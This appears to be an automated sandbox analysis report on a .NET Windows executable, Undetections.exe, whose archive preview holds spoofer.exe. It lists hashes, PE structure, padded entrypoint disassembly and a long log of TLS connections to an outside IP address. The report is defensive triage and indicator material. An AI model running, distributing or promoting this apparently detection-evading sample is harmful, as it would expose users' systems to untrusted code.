                                                                                                                                                                                                          Preview:PK..........XO_@.1I...X......spoofer.exe...T.K.(.qww.......-..C..<.......-.;A...p.......Z.gOuYWWUw...9..0.....__..&._M......7"Q."..f...Dv.D.......................XTA..........o..b..,.. R.......R..... ..../^?+...M...wo8._~.5...w.......0..@~....W...v............vw,.....C#......HK....b................N.N&.._......".... ........W@......0..i..............-w...f...P...h.=...@.....P.c.`..h, ...(.8&..&&....=...$.)...$.*....E...(`P...TQ ..4....4&.4-..88(.$...d....-..4.....&...D,9.p..P............*...*NS...]Q...A........F....#]oF0.`...V0..h.....Y.....[._..X..e.....(c.."t@...h.>......84.0...(>H.. .c.#)x#...Q.4..P..b.X"P`..,......&..}3...n.`..A.A.0..i......I...........i...L ok.@...".y;.....O..HjN+......./.._:k ^..L.2..S.H......`.....*l.;p..A.5.....h.8....o...(..r.......>2.....-..J!.4a!!.._...+....A..{....H......W.J..d...(..[~.sM...:.......~o ....v~;.~`o..f..F..1.}.[.H..@..6%0..@.<.&.../.7... T.@..*.7M.*..7........;L...&...&y.............8.@XEZ..m....7nl.L

                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                          General

                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                          Entropy (8bit):6.242001108764822
                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                          File name:Undetections.exe
                                                                                                                                                                                                          File size:1'800'192 bytes
                                                                                                                                                                                                          MD5:3af8847a68f187e5425af04cfe48d1cf
                                                                                                                                                                                                          SHA1:51005458a440023c8537db8a72f19094b91837b4
                                                                                                                                                                                                          SHA256:d241425f895f1f32b3f619c33d9b95820a25feb7ded489d449f36ac3c96b9865
                                                                                                                                                                                                          SHA512:50917f9580eb47f0b01cc90d57d40dca9eacdf01e5a80089148aa11fdbca2585e4c5cbf046f95c806f0771d4c47b7cfe7e477141d5352a4f9e4bc47ec2002f5e
                                                                                                                                                                                                          SSDEEP:12288:5V6HFV6H/YUeD1zgrmoxdGxa1PI+QDXMZ6GQ6ov2m+UtbVkGDvAd1sYV:5UHFUH/+1UrmyWalINbQUv2gVbAdR
                                                                                                                                                                                                          TLSH:4385DF95DA168EA6C98506F18862CF31B3200F28454DE70B67F5BDEB3EB53C96006FD6
                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..x............... ........@.. ....................................`................................

                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                          Icon Hash:0f3171f07068710f

                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Entrypoint:0x57972e
                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                          Time Stamp:0xEBAED08E [Wed Apr 20 01:46:54 2095 UTC]
                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                          File Version Major:4
                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                          add byte ptr [eax], al

                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1796d80x53.text
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x17a0000x3fa42.rsrc
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1ba0000xc.reloc
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                          Sections

                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                          .text0x20000x1777340x177800c2caef226b2a2ed9699eada5924263f2False0.6755335334137816data6.767519942563643IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .rsrc0x17a0000x3fa420x3fc00df48fb03c123468ea00572290537dd1bFalse0.05618489583333333data1.895097414640076IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .reloc0x1ba0000xc0x2006e012ae18a7ce7ab1fc2c5e2a86555abFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                          Resources

                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                          RT_ICON0x17a1300x3f428Device independent bitmap graphic, 245 x 512 x 32, image size 250880, resolution 2835 x 2835 px/m0.05367177128037297
                                                                                                                                                                                                          RT_GROUP_ICON0x1b95580x14data1.2
                                                                                                                                                                                                          RT_VERSION0x1b956c0x2ecdata0.43983957219251335
                                                                                                                                                                                                          RT_MANIFEST0x1b98580x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                                          Imports

                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                          mscoree.dll_CorExeMain

                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          Apr 10, 2024 08:56:06.043551922 CEST49732443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:06.043584108 CEST44349732193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:06.043682098 CEST49732443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:06.054780006 CEST49732443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:06.054800034 CEST44349732193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:06.764040947 CEST44349732193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:06.764241934 CEST49732443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:06.774631977 CEST49732443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:06.774641037 CEST44349732193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:06.774924040 CEST44349732193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:06.818849087 CEST49732443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:06.864233971 CEST44349732193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:07.050975084 CEST44349732193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:07.051033020 CEST44349732193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:07.051208019 CEST49732443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:07.055618048 CEST49732443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:07.287718058 CEST49734443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:07.287806988 CEST44349734193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:07.288096905 CEST49734443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:07.288503885 CEST49734443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:07.288593054 CEST44349734193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:07.995563984 CEST44349734193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:07.998584032 CEST49734443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:07.998647928 CEST44349734193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:08.232095957 CEST44349734193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:08.232151031 CEST44349734193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:08.232398987 CEST49734443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:08.233104944 CEST49734443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:08.235923052 CEST49735443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:08.235966921 CEST44349735193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:08.236069918 CEST49735443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:08.236377001 CEST49735443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:08.236401081 CEST44349735193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:08.955437899 CEST44349735193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:08.958031893 CEST49735443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:08.958074093 CEST44349735193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:09.195663929 CEST44349735193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:09.195719957 CEST44349735193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:09.195781946 CEST49735443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:09.216392994 CEST49735443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:09.219717026 CEST49737443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:09.219759941 CEST44349737193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:09.219841957 CEST49737443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:09.220308065 CEST49737443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:09.220321894 CEST44349737193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:09.945108891 CEST44349737193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:09.948239088 CEST49737443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:09.948256016 CEST44349737193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:10.185651064 CEST44349737193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:10.185720921 CEST44349737193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:10.185806990 CEST49737443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:10.186392069 CEST49737443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:10.187360048 CEST49739443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:10.187444925 CEST44349739193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:10.188308001 CEST49739443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:10.188545942 CEST49739443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:10.188585997 CEST44349739193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:10.937383890 CEST44349739193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:10.939335108 CEST49739443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:10.939368010 CEST44349739193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:11.182813883 CEST44349739193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:11.182868004 CEST44349739193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:11.183033943 CEST49739443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:11.183480978 CEST49739443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:11.184689045 CEST49740443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:11.184720993 CEST44349740193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:11.184830904 CEST49740443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:11.185154915 CEST49740443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:11.185175896 CEST44349740193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:11.916094065 CEST44349740193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:11.918334007 CEST49740443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:11.918350935 CEST44349740193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:12.159053087 CEST44349740193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:12.159127951 CEST44349740193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:12.159204006 CEST49740443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:12.159748077 CEST49740443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:12.257293940 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:12.257340908 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:12.257477999 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:12.257831097 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:12.257850885 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.041709900 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.041802883 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.043625116 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.043632030 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.043973923 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.045778036 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.092242002 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.556858063 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.556885958 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.556906939 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.557214975 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.557257891 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.557277918 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.557358980 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.812377930 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.812407017 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.812470913 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.812510014 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.812525988 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.812553883 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.812814951 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.812834024 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.812901020 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.812911034 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.812935114 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.812949896 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.813302040 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.813322067 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.813364983 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.813373089 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.813391924 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:13.813411951 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.068027973 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.068063021 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.068110943 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.068260908 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.068260908 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.068288088 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.068340063 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.068792105 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.068835974 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.068875074 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.068882942 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.068911076 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.068936110 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.069089890 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.069129944 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.069175005 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.069185019 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.069209099 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.069228888 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.069396973 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.069451094 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.069478035 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.069484949 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.069509983 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.069531918 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.069673061 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.069719076 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.069747925 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.069755077 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.069777012 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.069798946 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.069956064 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.069997072 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.070024967 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.070031881 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.070054054 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.070080042 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.323503017 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.323546886 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.323601007 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.323698997 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.323724985 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.323785067 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.323785067 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.324054003 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.324100018 CEST44349741193.109.246.100192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.324127913 CEST49741443192.168.2.4193.109.246.100
                                                                                                                                                                                                          Apr 10, 2024 08:56:14.324135065 CEST44349741193.109.246.100192.168.2.4
